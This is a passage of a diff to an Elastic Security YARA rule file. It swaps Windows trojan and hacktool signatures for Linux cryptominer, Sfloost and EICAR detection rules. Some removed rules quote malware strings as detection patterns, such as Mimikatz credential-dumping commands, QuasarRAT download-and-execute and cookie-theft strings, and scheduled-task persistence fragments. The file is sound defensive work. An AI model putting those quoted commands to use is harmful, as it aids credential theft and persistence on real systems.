(Linux.Trojan.Ngioweb)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "994f1e97-c370-4eb2-ac93-b5ebf112f55d" + id = "2627921e-6c0d-4515-a09a-b2c99a59598d" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ngioweb.yar#L161-L178" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "2384e787877b622445d7d14053a8340d2e97d3ab103a3fabfa08a40068726ad0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L701-L719" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "350a8ceabd8495e66cc58885f1ab38f602c66c162c05e4b6ae0e2a7977ec2cdf" + logic_hash = "edb2864719d62ab212bde1adf02dd17c8edc8ce4ae273b959e58a3eaf751fd7c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6cc0ace6beb6c1bf4e10f9781bb551c10f48cc23efe9529d92b432b0ff88f245" + fingerprint = "2551ece438a09700c825faa63caa3e21ced94c85bdaa5b1b0dd63603d4fa9bb6" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -110307,397 +110698,376 @@ rule ELASTIC_Linux_Trojan_Ngioweb_994F1E97 : FILE MEMORY os = "linux" strings: - $a = { C6 44 24 16 68 C6 44 24 15 63 C6 44 24 14 74 C6 44 24 13 61 C6 44 24 12 77 C6 44 24 11 2F C6 44 24 10 76 C6 44 24 0F 65 C6 44 24 0E 64 C6 44 24 0D 2F } + $a = { 0F 6F D0 66 44 0F 6F C1 66 0F 69 E2 66 44 0F 61 D2 66 44 0F } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Gvci_F5A35359 : FILE +rule ELASTIC_Linux_Cryptominer_Generic_E36A35B0 : FILE MEMORY { meta: - description = "Detects Windows Vulndriver Gvci (Windows.VulnDriver.Gvci)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "f5a35359-ee16-444a-aafd-c4ef162e46d4" - date = "2022-04-04" - modified = "2022-04-04" + id = "e36a35b0-cb38-4d2d-bca2-f3734637faa8" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Gvci.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f" - logic_hash = "beb0c324358a016e708dae30a222373113a7eab8e3d90dfa1bbde6c2f7874362" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L721-L739" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ab6d8f09df67a86fed4faabe4127cc65570dbb9ec56a1bdc484e72b72476f5a4" + logic_hash = "0572f584746a2af6f545798b25445fd4e764a9eecc01b7476e5c1af631eb314a" score = 75 quality = 75 - tags = "FILE" - fingerprint = "590e6b10c8bd1c299eb4ecd1368ac05d8811147c7ce3976de5e86d1a6d8bc14f" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "0ee42ff704c82ee6c2bc0408cccb77bcbae8d4405bb1f405ee09b093e7a626c0" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $str1 = "\\GVCIDrv64.pdb" + $a = { 71 F2 08 66 0F EF C1 66 0F EF D3 66 0F 7F 44 24 60 66 0F 7F 54 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + all of them } -rule ELASTIC_Windows_Trojan_Beam_E41B243A : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_6Dad0380 : FILE MEMORY { meta: - description = "Detects Windows Trojan Beam (Windows.Trojan.Beam)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "e41b243a-020f-485e-b4bc-4db9d593e7af" - date = "2021-12-07" - modified = "2022-04-12" + id = "6dad0380-7771-4fb9-a7e5-176eeb6fcfd7" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Beam.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "233a1f1dcbb679d31dab7744358b434cccabfc752baf53ba991388ced098f7c8" - logic_hash = "295837743ecfa51e1713d19cba24ff8885c8716201caac058ae8b2bc9e008e6c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L741-L759" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "628b1cc8ccdbe2ae0d4ef621da047e07e2532d00fe3d4da65f0a0bcab20fb546" + logic_hash = "b305448d5517212adb7586e7af12842095e1a263520511329e40f0865fe4f81b" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "0863f858fcc03d9b5994e73ee3b9daf64b57b0eecd67b718eafa2ed162cf7878" + fingerprint = "ffe022f42e98c9c1eeb3aead0aca9d795200b4b22f89e7f3b03baf96f18c9473" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 69 70 22 3A 22 28 5B 30 2D 39 2E 5D 2B 29 } - $a2 = { 63 6F 75 6E 74 72 79 5F 63 6F 64 65 22 3A 22 28 5C 77 2A 29 } - $a3 = { 20 2F 66 20 26 20 65 72 61 73 65 20 } - $a4 = "\\BeamWinHTTP2\\Release\\BeamWinHTTP.pdb" + $a = { 48 C1 E6 05 48 01 C6 48 39 F1 74 05 49 89 74 24 08 44 89 E9 48 C1 } condition: all of them } -rule ELASTIC_Windows_Trojan_Beam_5A951D13 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_E73F501E : FILE MEMORY { meta: - description = "Detects Windows Trojan Beam (Windows.Trojan.Beam)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "5a951d13-9568-4a5f-bda3-645143bc16a1" - date = "2021-12-07" - modified = "2022-04-12" + id = "e73f501e-019c-4281-ae93-acde7ad421af" + date = "2021-12-13" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Beam.yar#L24-L42" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "233a1f1dcbb679d31dab7744358b434cccabfc752baf53ba991388ced098f7c8" - logic_hash = "3419b649717b69f07334bd966f438dd0b77f03572fe14f4b88ce95a2a86cae07" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L761-L779" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2f646ced4d05ba1807f8e08a46ae92ae3eea7199e4a58daf27f9bd0f63108266" + logic_hash = "2f6187f3447f9409485e9e8aa047114aa3c38bcc338106c3ed8680152dff121a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e3de6b47e563ebfd735cdd56f5b4077a8923026520ecca0628c5704272ea52bb" - severity = 99 + fingerprint = "bd9e6f2548c918b2c439a047410b6b239c3993a3dbd85bfd70980c64d11a6c5c" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 24 40 8B CE 2B C8 3B CA 0F 42 D1 83 FF 10 8D 4C 24 18 0F 43 CB } + $a = { 03 51 8A 92 FF F3 20 01 DE 63 AF 8B 54 73 0A 65 83 64 88 60 } condition: all of them } -rule ELASTIC_Windows_Hacktool_Sharpdump_7C17D8B1 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_5E56D076 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Sharpdump (Windows.Hacktool.SharpDump)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "7c17d8b1-35cf-440e-8f4e-44abdc2054bb" - date = "2022-10-20" - modified = "2022-11-24" + id = "5e56d076-0d6d-4979-8ebc-52607dcdb42d" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_SharpDump.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "14c3ea569a1bd9ac3aced4f8dd58314532dbf974bfa359979e6c7b6a4bbf41ca" - logic_hash = "10ca29b097d9f1cef27349751e8f1e584ead1056a636224a80f00823ca878c13" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L781-L799" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "32e1cb0369803f817a0c61f25ca410774b4f37882cab966133b4f3e9c74fac09" + logic_hash = "c8e2ebcffe8a169c2cc311c95538b674937fa87e06d2946a6ed3b0c1f039f7fc" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "cf1e23fc0a317959fceadae8984240b174dac22a1bcabccf43c34f0186a3ac23" + fingerprint = "e9ca9b9faee091afed534b89313d644a52476b4757663e1cdfbcbca379857740" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $guid = "9c9bba3-a0ea-431c-866c-77004802d" ascii wide nocase - $print_str0 = "Please use \"SharpDump.exe [pid]\" format" ascii wide - $print_str1 = "[*] Use \"sekurlsa::minidump debug.out\" \"sekurlsa::logonPasswords full\" on the same OS/arch" ascii wide - $print_str2 = "[+] Dumping completed. Rename file to \"debug{0}.gz\" to decompress" ascii wide - $print_str3 = "[X] Not in high integrity, unable to MiniDump!" ascii wide + $a = { 71 18 4C 89 FF FF D0 48 8B 84 24 A0 00 00 00 48 89 43 60 48 8B 84 24 98 00 } condition: - $guid or all of ($print_str*) + all of them } -rule ELASTIC_Windows_Trojan_Quasarrat_E52Df647 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_54357231 : FILE MEMORY { meta: - description = "Detects Windows Trojan Quasarrat (Windows.Trojan.Quasarrat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "e52df647-c197-4790-b051-8951fba80c3b" - date = "2021-06-27" - modified = "2021-08-23" + id = "54357231-23d8-44f5-94d7-71da02a8ba38" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Quasarrat.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d" - logic_hash = "41f32e0c9b3b43d10baef10060e064ad860558bcdeb4281a30d30c16615ed21d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L801-L819" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "388b927b850b388e0a46a6c9a22b733d469e0f93dc053ebd78996e903b25e38a" + logic_hash = "a895c9fd124d6bd55748093c3ef54606e5692285260aa21bd70dca02126239d2" score = 75 - quality = 50 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815" + fingerprint = "8bbba49c863bc3d53903b1a204851dc656f3e3d68d3c8d5a975ed2dc9e797e13" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "GetKeyloggerLogsResponse" ascii fullword - $a2 = "DoDownloadAndExecute" ascii fullword - $a3 = "http://api.ipify.org/" wide fullword - $a4 = "Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7}" wide fullword - $a5 = "\" /sc ONLOGON /tr \"" wide fullword + $a = { 73 F2 06 C5 F9 EB C2 C4 E3 79 16 E0 02 C4 E3 79 16 E2 03 C5 F9 70 } condition: - 4 of them + all of them } -rule ELASTIC_Windows_Trojan_Matanbuchus_B521801B : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_467C4D46 : FILE MEMORY { meta: - description = "Detects Windows Trojan Matanbuchus (Windows.Trojan.Matanbuchus)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "b521801b-5623-4bfe-9a9d-9e16afa63c63" - date = "2022-03-17" - modified = "2022-04-12" + id = "467c4d46-3272-452c-9251-3599d16fc916" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Matanbuchus.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2" - logic_hash = "609a0941b118d737124a5cd9c98c007e21557a239cfa3cf97cd3b4348c934f03" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L821-L839" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "388b927b850b388e0a46a6c9a22b733d469e0f93dc053ebd78996e903b25e38a" + logic_hash = "b28f871365c1fa6315b1c2fc6698bdd224961972cd578db05c311406c239ac22" score = 75 - quality = 25 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "7792cffc82678bb05ba1aa315011317611eb0bf962665e0657a7db2ce95f81b4" + fingerprint = "cbde94513576fdb7cabf568bd8439f0194d6800373c3735844e26d262c8bc1cc" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "%PROCESSOR_ARCHITECTURE%" ascii fullword - $a2 = "%PROCESSOR_REVISION%\\" ascii fullword - $a3 = "%LOCALAPPDATA%\\" ascii fullword - $a4 = "\"C:\\Windows\\system32\\schtasks.exe\" /Create /SC MINUTE /MO 1 /TN" ascii fullword + $a = { 49 8B 77 08 48 21 DE 4C 39 EE 75 CE 66 41 83 7F 1E 04 4C 89 F5 } condition: all of them } -rule ELASTIC_Windows_Trojan_Matanbuchus_4Ce9Affb : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_E0Cca9Dc : FILE MEMORY { meta: - description = "Detects Windows Trojan Matanbuchus (Windows.Trojan.Matanbuchus)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "4ce9affb-58ef-4d31-b1ff-5a1c52822a01" - date = "2022-03-17" - modified = "2022-04-12" + id = "e0cca9dc-0f3e-42d8-bb43-0625f4f9bfe1" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Matanbuchus.yar#L24-L42" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2" - logic_hash = "16441eb4617b6b3cb1e7d600959a5cbfe15c72c00361b45551b7ef4c81f78462" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L841-L859" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "59a1d8aa677739f2edbb8bd34f566b31f19d729b0a115fef2eac8ab1d1acc383" + logic_hash = "fa4089f74fc78e99427b4e8eda9f8348e042dc876c7281a4a2173c83076bfbd2" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435" + fingerprint = "e7bc17ba356774ed10e65c95a8db3b09d3b9be72703e6daa9b601ea820481db7" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B } + $a = { 54 24 40 48 8D 94 24 C0 00 00 00 F3 41 0F 6F 01 48 89 7C 24 50 48 89 74 } condition: all of them } -rule ELASTIC_Windows_Trojan_Matanbuchus_58A61Aaa : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_36E404E2 : FILE MEMORY { meta: - description = "Detects Windows Trojan Matanbuchus (Windows.Trojan.Matanbuchus)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "58a61aaa-51b2-47f2-ab32-2e639957b2d5" - date = "2022-03-17" - modified = "2022-04-12" + id = "36e404e2-be7c-40dc-b861-8ab929cad019" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Matanbuchus.yar#L44-L62" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2" - logic_hash = "7226e2f61bd6f1cca15c1f3f8d8697cb277d1e214f756295ffda5bc16304cc49" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L861-L879" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "59a1d8aa677739f2edbb8bd34f566b31f19d729b0a115fef2eac8ab1d1acc383" + logic_hash = "d38cc5714721c0b00cfa47cb9828fd76ff57ec8180e5cfe1fec67a092dd87904" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5" + fingerprint = "7268b94d67f586ded78ad3a52b23a81fd4edb866fedd0ab1e55997f1bbce4c72" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB ?? 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55 } + $a = { 61 6C 73 65 20 70 6F 73 69 74 69 76 65 29 1B 5B 30 6D 00 44 45 } condition: all of them } -rule ELASTIC_Windows_Trojan_Matanbuchus_C7811Ccc : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_947Dcc5E : FILE MEMORY { meta: - description = "Detects Windows Trojan Matanbuchus (Windows.Trojan.Matanbuchus)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "c7811ccc-5d8d-4bc8-a630-ac3282bb207e" - date = "2022-03-17" - modified = "2022-04-12" + id = "947dcc5e-be4c-4d31-936f-63d466db2934" + date = "2024-04-19" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Matanbuchus.yar#L64-L82" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2" - logic_hash = "e65dc05f6d9289a42c05afdc4da0ce1c18c1129dd87688a277ece925e83d7ef1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L881-L899" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7c5a6ac425abe60e8ea5df5dfa8211a7c34a307048b4e677336b735237dcd8fd" + logic_hash = "c4aac006561386fbfe0fa0fe3df6b6798d2915a3dbfb5384583ebf9b2f413115" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "05f209a24d9eb2be7fa50444d8271b6f147027291f55a352ac3af5e9b3207010" + fingerprint = "f6087a90a9064b505b60a1c53af008b025064f4a823501cae5f00bbe5157d67b" severity = 100 - arch_context = "x86" + arch_context = "x86, arm64" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB ?? 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55 10 77 ?? 72 ?? 8B 45 F8 3B 45 0C 73 ?? 6A 00 6A 08 8B 4D FC 51 8B 55 F8 52 E8 ?? ?? ?? ?? 6A 00 6A 08 52 50 E8 ?? ?? ?? ?? 8B C8 8B 45 14 8B 55 18 E8 ?? ?? ?? ?? 0F BE F0 6A 00 6A 01 8B 55 FC 52 8B 45 F8 50 E8 ?? ?? ?? ?? 8B 4D 08 0F BE 1C 01 33 DE 6A 00 6A 01 8B 55 FC 52 8B 45 F8 50 E8 ?? ?? ?? ?? 8B 4D 08 88 1C 01 E9 ?? ?? ?? ?? 5E 5B 8B E5 5D C2 14 00 } + $a = { 28 00 00 0A 30 51 9F E5 04 20 94 E5 04 30 A0 E1 38 00 44 E2 00 40 94 E5 00 40 82 E5 04 20 93 E5 04 20 84 E5 0C 20 13 E5 00 30 83 E5 04 00 12 E3 04 30 83 E5 06 00 00 0A 04 10 C2 E3 08 00 12 E3 } condition: all of them } -rule ELASTIC_Windows_Trojan_Powerseal_D63F5E54 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_B4C2D007 : FILE MEMORY { meta: - description = "Detects Windows Trojan Powerseal (Windows.Trojan.PowerSeal)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "d63f5e54-6be1-453d-a96e-083a025deba2" - date = "2023-03-16" - modified = "2023-05-26" - reference = "https://www.elastic.co/security-labs/elastic-charms-spectralviper" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_PowerSeal.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "523dcff68a51ea8fb022066b5f09394e8174d6c157222a08100de30669898057" + id = "b4c2d007-9464-4b72-ae2d-b0f1aeaa6fca" + date = "2024-04-19" + modified = "2024-06-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L901-L919" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e1e518ba226d30869e404b92bfa810bae27c8b1476766934961e80c44e39c738" + logic_hash = "cb52d9233028918210b8bd3959a6649d75b5c6873befff0cf62d9e71dfecc302" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bc63511a0b12edaf7a2ace02f79ab9a2dbea5a0879fd976cc91308f98bac1c52" + fingerprint = "364fa077b99cd32d790399fd9f06f99ffef19c37487ef8a4fd81bf36988ecaa6" severity = 100 - arch_context = "x86" + arch_context = "x86, arm64" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "PowerSeal.dll" wide fullword - $a2 = "InvokePs" ascii fullword - $a3 = "amsiInitFailed" wide fullword - $a4 = "is64BitOperatingSystem" ascii fullword + $a = { FD 03 00 91 F3 53 01 A9 F4 03 00 AA 20 74 40 F9 60 17 00 B4 20 10 42 79 F3 03 01 AA F9 6B 04 A9 40 17 00 34 62 62 40 39 F5 5B 02 A9 26 10 40 39 F7 63 03 A9 63 12 40 B9 FB 73 05 A9 3B A0 03 91 } condition: all of them } -rule ELASTIC_Windows_Trojan_Powerseal_2E50F393 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Sfloost_69A5343A : FILE MEMORY { meta: - description = "Detects Windows Trojan Powerseal (Windows.Trojan.PowerSeal)" + description = "Detects Linux Trojan Sfloost (Linux.Trojan.Sfloost)" author = "Elastic Security" - id = "2e50f393-40c0-49f7-882e-33f914eff32d" - date = "2023-05-10" - modified = "2023-06-13" - reference = "https://www.elastic.co/security-labs/elastic-charms-spectralviper" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_PowerSeal.yar#L24-L44" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "3ca1d4568fea7b2e4e9d30ba03662a2c28ee8623d887a0336e27989b5c98b55f" + id = "69a5343a-4885-4d88-9eaf-ddfcc95e1f39" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Sfloost.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c0cd73db5165671c7bbd9493c34d693d25b845a9a21706081e1bf44bf0312ef9" + logic_hash = "bd3cd33d02c7ca1d3a0364e5e3e2f968f32da8f087f744232f3cb786da6c7875" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9b7beb5af64bc57d78cfb8f5bf8134461d8f2fbe7c935a0fa2b44fb51160a28d" + fingerprint = "c19368bf04e4b67537a8573b5beba56bab8bcfdf870640ef5bd46d40735ee539" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "[+] Loading PowerSeal" - $a2 = "[!] Failed to exec PowerSeal" - $a3 = "AppDomain: unable to get the name!" + $a = { 0F 83 C8 50 88 43 0C 0F B6 45 F0 66 C7 43 10 00 00 66 C7 43 12 } condition: - 2 of them + all of them } -rule ELASTIC_Windows_Hacktool_Sharprdp_80895Fcb : FILE MEMORY +rule ELASTIC_Multi_EICAR_Ac8F42D6 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Sharprdp (Windows.Hacktool.SharpRDP)" + description = "Detects Multi Eicar Not A Virus (Multi.EICAR.Not-a-virus)" author = "Elastic Security" - id = "80895fcb-b98e-4865-a1f6-87cbea327cea" - date = "2022-11-20" - modified = "2023-01-11" + id = "ac8f42d6-52da-46ec-8db1-5a5f69222a38" + date = "2021-01-21" + modified = "2022-01-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_SharpRDP.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6e909861781a8812ee01bc59435fd73fd34da23fa9ad6d699eefbf9f84629876" - logic_hash = 